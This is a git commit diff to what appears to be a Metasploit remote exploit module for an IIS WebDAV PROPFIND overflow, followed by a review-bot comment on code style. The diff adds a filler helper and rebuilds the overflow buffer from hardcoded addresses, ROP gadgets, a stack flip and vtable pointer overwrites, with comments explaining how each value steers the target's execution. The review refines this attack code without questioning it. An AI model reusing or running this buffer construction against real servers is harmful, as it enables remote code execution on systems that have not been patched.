Added make_junk function

bug/bundler_fix
lincoln 2017-05-18 19:06:09 -07:00
parent 2f39daafc5
commit 7ca0fe5a68
1 changed files with 11 additions and 6 deletions


@ -157,6 +157,11 @@ class MetasploitModule < Msf::Exploit::Remote
return str.force_encoding('UTF-16LE').encode('UTF-8')
end
#filler chars to be encoded
def make_junk(len)
return utf_encode_str(rand_text_alpha(len))
end
def exploit
# extract the local servername and port from a PROPFIND request
# these need to be the values from the backend server
@ -189,28 +194,28 @@ class MetasploitModule < Msf::Exploit::Remote
begin
buf1 = "<#{http_host}/"
buf1 << rand_text_alpha(114 - path_len)
buf1 << utf_encode_str(junk * 16)
buf1 << make_junk(32)
#survive SHR instruction 0x02020202
buf1 << utf_encode_str([0x02020202].pack('V'))
#str pointer to .data httpext.dll # ebp-328 # used in wcslen calculation
buf1 << utf_encode_str([0x680312c0].pack('V'))
buf1 << utf_encode_str(junk * 20)
buf1 << make_junk(40)
#0x680313c0 -> destination pointer used with memcpy
buf1 << utf_encode_str([0x680313c0].pack('V'))
buf1 << ">"
buf1 << " (Not <locktoken:write1>) <#{http_host}/"
buf1 << rand_text_alpha(114 - path_len)
buf1 << utf_encode_str(junk * 14)
buf1 << make_junk(28)
#0x680313c0 -> pointer to call itself at same address for vtable call
buf1 << utf_encode_str([0x680313c0].pack('V'))
#ROP 2 gadget -> advance ESP past previous instructions to start of ROP chain
#msvct.dll 0x77bdf38d # ADD ESP,1C # POP ECX # POP EBX # POP EAX # RETN
buf1 << utf_encode_str([0x77bdf38d].pack('V'))
buf1 << utf_encode_str(junk * 4)
#0x680313c0 -> vtable pointer passed to EAX for [call eax +24]
buf1 << make_junk(8)
#0x680313c0 -> vtable pointer passed to EAX for call [eax +24]
#point to itself at [eax]
buf1 << utf_encode_str([0x680313c0].pack('V'))
buf1 << utf_encode_str(junk * 8)
buf1 << make_junk(16)
#ROP 1 gadget -> 0x68016082 stack flip get ECX into ESP and push EAX
#which also points to new ESP
buf1 << utf_encode_str([0x68016082].pack('V'))
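Review bot: `make_junk` in the first hunk uses an explicit `return` on its only expression and a bare `#filler chars to be encoded` comment with no space after `#`; the file's other helpers rely on implicit return, so the method reads better as `# Random alphabetic filler of +len+ bytes, encoded with utf_encode_str like the rest of the buffer.` above `def make_junk(len)` / `  utf_encode_str(rand_text_alpha(len))` / `end`. In the second hunk each `utf_encode_str(junk * N)` becomes `make_junk(2 * N)`, which only keeps the buffer layout intact if `junk` was presumably a two-character string, and it also swaps a repeated fixed token for random text; a one-line comment on the first `make_junk` call stating the intended byte length would make the 32/40/28/8/16 arguments verifiable. If nothing outside these hunks still reads `junk`, its assignment is now dead and should be removed in the same commit. The second hunk lies inside `exploit`, whose body begins before the `begin` shown and continues past the last line of the hunk.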